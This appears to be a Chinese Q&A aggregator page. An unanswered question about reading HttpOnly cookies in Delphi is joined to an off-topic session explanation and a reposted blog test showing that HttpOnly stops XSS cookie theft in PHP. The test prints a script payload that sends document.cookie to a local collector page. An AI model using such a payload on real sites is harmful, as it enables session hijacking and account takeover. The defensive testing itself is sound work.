设置了HttpOnly属性的COOKIES用DELPHI怎么访问
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了设置了HttpOnly属性的COOKIES用DELPHI怎么访问相关的知识,希望对你有一定的参考价值。
参考技术A session 分成两部分,session空间存放于服务器端,打开空间的ID 存放于 客户端的cookie, 如果客户端关闭了cookie,session就不能正常的使用。来源:
Session 的中文译名叫做“会话”,其本来的含义是指有始有终的一系列动作/消息,比如打电话时从拿起电话拨号到挂断电话这中间的一系列过程可以称之为一个 session。目前社会上对session的理解非常混乱:有时候我们可以看到这样的话“在一个浏览器会话期间,...”,这里的会话是指从一个浏览器窗口打开到关闭这个期间;也可以看到“用户(客户端)在一次会话期间”这样一句话,它可能指用户的一系列动作(一般情况下是同某个具体目的相关的一系列动作,比如从登录到选购商品到结账登出这样一个网上购物的过程;然而有时候也可能仅仅是指一次连接;其中的差别只能靠上下文来推断了。本回答被提问者和网友采纳
cookie设置httponly属性防护XSS攻击
攻击者利用XSS漏洞获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,攻击这里用获取的COOKIE登陆账号,并进行非法操作。
COOKIE设置httponly属性可以化解XSS漏洞攻击带来的窃取cookie的危害。
PHP中COOKIE设置方法:
<?php
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);
?>
最后一个字段false是为不设置httponly属性,true为已设置httponly属性。
测试内容:
本次测试环境,搭建一个包含XSS漏洞的php环境。
如图所示:
存在xss漏洞,获取cookie的代码为:
<script>document.location = ‘http://localhost/cookie_collect.php?cookie=‘ + document.cookie;</script>
获取COOKIE的页面为:http://localhost/cookie_collect.php
如图所示:
测试01
未设置httponly属性,cookie设置为:
<?php
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);
?>
测试结果:
获取到cookie的内容,如图所示:
访问日志内容为:
测试结果:利用跨站漏洞可以获取cookie内容。
测试02
设置httponly属性,cookie设置为:
<?php
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, true);
?>
测试结果:
未获取到cookie的内容,如图所示:
访问日志内容为:
测试结果:利用跨站漏洞不能够获取cookie内容。
本文出自 “Mask_X 博客” 博客,请务必保留此出处http://zhpfbk.blog.51cto.com/4757027/1888902
以上是关于设置了HttpOnly属性的COOKIES用DELPHI怎么访问的主要内容,如果未能解决你的问题,请参考以下文章